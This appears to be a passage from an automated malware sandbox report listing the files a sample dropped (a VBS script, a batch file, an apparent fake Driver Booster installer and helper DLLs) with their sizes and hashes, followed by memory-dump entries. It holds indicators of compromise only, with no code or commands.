6740d093a86c1f5121ee3c6db351152b9f97b06b0bad2a18545964d2e9e2d557cff07e6461e0772c0caa46ee265f82bf85ea78c512a98d377e0b8b261e7cd347

Download Submit
C:\ProgramData\dwEY\MMF.vbs
Filesize
30KB

MD5
bd64d967bf72703baaf72bfb5b353b4b

SHA1
ce34e28d066cd9b18d7fd7877c61481dfb6767cb

SHA256
c79920873a439db91c50ec806da982920d8b3d06f9fdfda0b457acaa6220606a

SHA512
ef79c00a3d4c7a66872cc55400f4db14f106f5a5852798fc98df298f801cddc744d20648dfeea2bfee229496cf6cefbe2b92925b82e579c4f6fa26e4c507de43

Download Submit
C:\ProgramData\dwEY\extracted\909.exe
Filesize
2.5MB

MD5
0d48cb857d930b968876f0616fc175b1

SHA1
0d506c8ced881691e13bddd8dc822fb45b934ad2

SHA256
e1855703193393b22bd8a978dfe9428d6f357cb6773c5126d42a08b9faed33c3

SHA512
08e4bab8421a88a087e7882cc41546db3a2e9a5f4295ad469e878219573f8766210136a2e8910a8072105466b6c2e7636e97d7f6a4dc20153bef66e0adbbf5d4

Download Submit
C:\ProgramData\dwEY\extracted\ANTIAV~1.DAT
Filesize
2.0MB

MD5
434e42ef336011f297c1a7282d993fbb

SHA1
116297ed7c883ac2dded77be27b67d6b97ce62b3

SHA256
8a32b308109d467bb5bd5a0b9539dc1c9d8386b90c18bff627afef7c1e37873f

SHA512
bc9c8c2ca10113b7654efdbcc658bfcc570bf6a84694755477f263e0837ccda71c55c4cb676160c5017a7d177db27097a1092dd04f167bb927e6046696e73b06

Download Submit
C:\ProgramData\dwEY\extracted\file_1.zip
Filesize
1.2MB

MD5
f099186baa5b7c38f5b667d2afb3c74a

SHA1
08e816bd1665fb87f3fa4fe9b19c81e5f024a174

SHA256
f40bb2e44e326a0fd98625bef85491087491871be813720a619361ce7c5a9da1

SHA512
551198b0fdf9da4becae1e63072ec1c7bfb001d26e1448f8ce7606754a47199b6429670bc70ad20f6a025f9ad35e17f25e06e62316e30fe180b3a66e4fd54739

Download Submit
C:\ProgramData\dwEY\extracted\file_2.zip
Filesize
1.2MB

MD5
eb06b8002e222e074000adc9ef46d46d

SHA1
49d4021f01420d2323f31df273aecb754946243c

SHA256
81c1acfb861ad9075e32536bab945a3629de809882fb13e44bf24d673a1ccdb8

SHA512
e173efbe76af2c984130cf6218f5727fa6b428f2d31b7ff9e17ca3d305d91fd33dadf88abf519dae1f35fe92bd2a0415f6ce88fd23770e94e8f715592c05322a

Download Submit
C:\ProgramData\dwEY\extracted\file_3.zip
Filesize
2.7MB

MD5
dfa31abc6e187ca1cb46607d6ba01ba4

SHA1
81a2bbd6332a773b606f558991195ec6605d0f2f

SHA256
34e1b8bf204b747f4b7b73c3193557a0391cd140f2c0aa27c3cc848e74fac883

SHA512
ca16ac130fc8e3c37fbe8a406f848db0c0e22dc542531943b489f5f2862a743e9d45169355299c5d8ef37f1735a86d4c7a79ffeec858e56cde7581afef8c65dc

Download Submit
C:\ProgramData\dwEY\file.bin
Filesize
2.7MB

MD5
fff984fd7bffad92188e006bb3a499f2

SHA1
4c7a4f3f5d2c79cfdb7a2082250855ecf9cc0119

SHA256
d5a66bfd241b8773361b71e59169dd3fef06a92f3df617013f71110c5a1d1856

SHA512
a7c3e2d08ebebc2fe500d2d98f5563b24ba70b851fd04db13f013a7a3680a5a339c5d96527911bb1e6d498d417a508cf0934a4fc838a76b5b160ba002746f371

Download Submit
C:\ProgramData\dwEY\main.bat
Filesize
386B

MD5
6c8a2382bb20b2c50d970996f03a11fa

SHA1
64f64b4c0938ed74932a7537bae32f8a8d0a40e8

SHA256
760468c7bc531dcf304a8a0ee39798dc2013a1821bcef536f070d3528640bc84

SHA512
8a2be2da1afc0a0ea912ec74ac49f8340f6a907121111c773ec1b4da4a1e9c19932aded54e5c7238c365ecb0cca3631a1b0ca7964138511cc70ebd2b769d027c

Download Submit
C:\Users\Admin\AppData\Local\Temp\4acacee3-cefe-4dab-b6f1-01f9a63ec79a\e.dll
Filesize
94KB

MD5
14ff402962ad21b78ae0b4c43cd1f194

SHA1
f8a510eb26666e875a5bdd1cadad40602763ad72

SHA256
fb9646cb956945bdc503e69645f6b5316d3826b780d3c36738d6b944e884d15b

SHA512
daa7a08bf3709119a944bce28f6ebdd24e54a22b18cd9f86a87873e958df121a3881dcdd5e162f6b4e543238c7aef20f657c9830df01d4c79290f7c9a4fcc54b

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-2OC32.tmp\Driver.Booster.7.5.0.751.tmp
Filesize
1.2MB

MD5
790761a71cb61ac50c7d04b3da72a167

SHA1
6558d25b86327810bf34f256fdf4dd94127992e2

SHA256
8336a622b1b6469a2b2834381e4a15d39988145e1915c249be8dd359ebd28e68

SHA512
90b9d09e59c06c3b7e3c0eb45e072fcf4eeb846f8a43179ce7910ef1faa0b15c85c187a509c1b3d308b3f5b06518c17c9ce9a668a11bf22a4495f0c593a99ad3

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-B70MN.tmp\_isetup\_iscrypt.dll
Filesize
2KB

MD5
a69559718ab506675e907fe49deb71e9

SHA1
bc8f404ffdb1960b50c12ff9413c893b56f2e36f

SHA256
2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc

SHA512
e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-QPI2M.tmp\71273ccf9881c6a687023fa1c40df85278346d3229307aee6cea6e7f6910925e.tmp
Filesize
2.4MB

MD5
a88faf8a031cfac67333a10cc3a078ac

SHA1
d63630e283e3d190dbdea7e3e24739a1e270881a

SHA256
55c62e226bd77e77a9b8518f268ccb5cba696885290366633d86bc6776dcede1

SHA512
489292a1a3094c43fc42dec23baaa00a0051e7f214e53529b72b2ca9c537cf7ad2d5b82030d3c7537ccc88ef1d348aca97e6369be6add0f9dcd0cf615b23f8c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-QQMPO.tmp\b2p.dll
Filesize
22KB

MD5
ab35386487b343e3e82dbd2671ff9dab

SHA1
03591d07aea3309b631a7d3a6e20a92653e199b8

SHA256
c3729545522fcff70db61046c0efd962df047d40e3b5ccd2272866540fc872b2

SHA512
b67d7384c769b2b1fdd3363fc3b47d300c2ea4d37334acfd774cf29169c0a504ba813dc3ecbda5b71a3f924110a77a363906b16a87b4b1432748557567d1cf09

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-QQMPO.tmp\botva2.dll
Filesize
37KB

MD5
67965a5957a61867d661f05ae1f4773e

SHA1
f14c0a4f154dc685bb7c65b2d804a02a0fb2360d

SHA256
450b9b0ba25bf068afbc2b23d252585a19e282939bf38326384ea9112dfd0105

SHA512
c6942818b9026dc5db2d62999d32cf99fe7289f79a28b8345af17acf9d13b2229a5e917a48ff1f6d59715bdbcb00c1625e0302abcfe10ca7e0475762e0a3f41b

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-QQMPO.tmp\botva2.dll
Filesize
37KB

MD5
67965a5957a61867d661f05ae1f4773e

SHA1
f14c0a4f154dc685bb7c65b2d804a02a0fb2360d

SHA256
450b9b0ba25bf068afbc2b23d252585a19e282939bf38326384ea9112dfd0105

SHA512
c6942818b9026dc5db2d62999d32cf99fe7289f79a28b8345af17acf9d13b2229a5e917a48ff1f6d59715bdbcb00c1625e0302abcfe10ca7e0475762e0a3f41b

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-QQMPO.tmp\iswin7logo.dll
Filesize
39KB

MD5
1ea948aad25ddd347d9b80bef6df9779

SHA1
0be971e67a6c3b1297e572d97c14f74b05dafed3

SHA256
30eb67bdd71d3a359819a72990029269672d52f597a2d1084d838caae91a6488

SHA512
f2cc5dce9754622f5a40c1ca20b4f00ac01197b8401fd4bd888bfdd296a43ca91a3ca261d0e9e01ee51591666d2852e34cee80badadcb77511b8a7ae72630545

Download Submit
memory/460-169-0x0000000000000000-mapping.dmp

Download
memory/760-161-0x0000000000000000-mapping.dmp

Download
memory/1008-170-0x0000000000000000-mapping.dmp

Download
memory/1012-195-0x0000000000000000-mapping.dmp

Download
memory/1132-160-0x0000000000000000-mapping.dmp

Download
memory/1156-208-0x0000000000000000-mapping.dmp

Download
memory/1160-212-0x0000000000000000-mapping.dmp

Download
memory/1160-216-0x0000000000DC0000-0x0000000000FDA000-memory.dmp

Filesize
2.1MB

Download
memory/1160-222-0x0000000005E70000-0x0000000005F02000-memory.dmp

Filesize
584KB

Download
memory/1160-220-0x00000000062E0000-0x0000000006884000-memory.dmp

Filesize
5.6MB

Download
memory/1160-224-0x00000000742D0000-0x0000000074359000-memory.dmp

Filesize
548KB

Download
memory/1160-221-0x0000000005D80000-0x0000000005DC4000-memory.dmp

Filesize
272KB

Download
memory/1176-149-0x0000000000000000-mapping.dmp

Download
memory/1304-218-0x0000000007150000-0x0000000007153000-memory.dmp

Filesize
12KB

Download
memory/1304-217-0x0000000073D10000-0x0000000073D2B000-memory.dmp

Filesize
108KB

Download
memory/1304-142-0x0000000000000000-mapping.dmp

Download
memory/1304-148-0x0000000007330000-0x000000000733F000-memory.dmp

Filesize
60KB

Download
memory/1432-184-0x0000000000000000-mapping.dmp

Download
memory/1544-165-0x0000000000000000-mapping.dmp

Download
memory/1552-203-0x0000000000000000-mapping.dmp

Download
memory/1592-187-0x0000000000000000-mapping.dmp

Download
memory/1664-171-0x0000000000000000-mapping.dmp

Download
memory/1668-175-0x0000000000000000-mapping.dmp

Download
memory/1696-186-0x0000000000000000-mapping.dmp

Download
memory/1728-141-0x0000000000400000-0x000000000045F000-memory.dmp

Filesize
380KB

Download
memory/1728-138-0x0000000000400000-0x000000000045F000-memory.dmp

Filesize
380KB

Download
memory/1728-136-0x0000000000000000-mapping.dmp

Download
memory/1760-163-0x0000000000000000-mapping.dmp

Download
memory/1820-158-0x0000000000000000-mapping.dmp

Download
memory/1936-177-0x0000000000000000-mapping.dmp

Download
memory/1976-207-0x0000000000000000-mapping.dmp

Download
memory/2056-202-0x0000000000000000-mapping.dmp

Download
memory/2236-164-0x0000000000000000-mapping.dmp

Download
memory/2308-196-0x0000000000000000-mapping.dmp

Download
memory/2616-166-0x0000000000000000-mapping.dmp

Download
memory/2660-194-0x0000000000000000-mapping.dmp

Download
memory/2772-189-0x0000000000000000-mapping.dmp

Download
memory/2948-185-0x0000000000000000-mapping.dmp

Download
memory/3128-132-0x0000000000000000-mapping.dmp

Download
memory/3184-176-0x0000000000000000-mapping.dmp

Download
memory/3260-214-0x0000000000000000-mapping.dmp

Download
memory/3268-159-0x0000000000000000-mapping.dmp

Download
memory/3348-178-0x0000000000000000-mapping.dmp

Download
memory/3452-180-0x0000000000000000-mapping.dmp

Download
memory/3756-152-0x0000000000000000-mapping.dmp

Download
memory/3840-215-0x0000000000000000-mapping.dmp

Download
memory/3872-197-0x0000000000000000-mapping.dmp

Download
memory/3992-172-0x0000000000000000-mapping.dmp

Download
memory/4000-156-0x0000000000000000-mapping.dmp

Download
memory/4020-183-0x0000000000000000-mapping.dmp

Download
memory/4040-154-0x0000000000000000-mapping.dmp

Download
memory/4332-168-0x0000000000000000-mapping.dmp

Download
memory/4356-162-0x0000000000000000-mapping.dmp

Download
memory/4412-209-0x0000000000000000-mapping.dmp

Download
memory/4552-174-0x0000000000000000-mapping.dmp

Download
memory/4592-130-0x0000000000400000-0x00000000004C0000-memory.dmp

Filesize
768KB

Download
memory/4592-135-0x0000000000400000-0x00000000004C0000-memory.dmp

Filesize
768KB

Download
memory/4636-190-0x0000000000000000-mapping.dmp

Download
memory/4784-201-0x0000000000000000-mapping.dmp

Download
memory/4952-173-0x0000000000000000-mapping.dmp

Download
memory/5064-167-0x0000000000000000-mapping.dmp

Download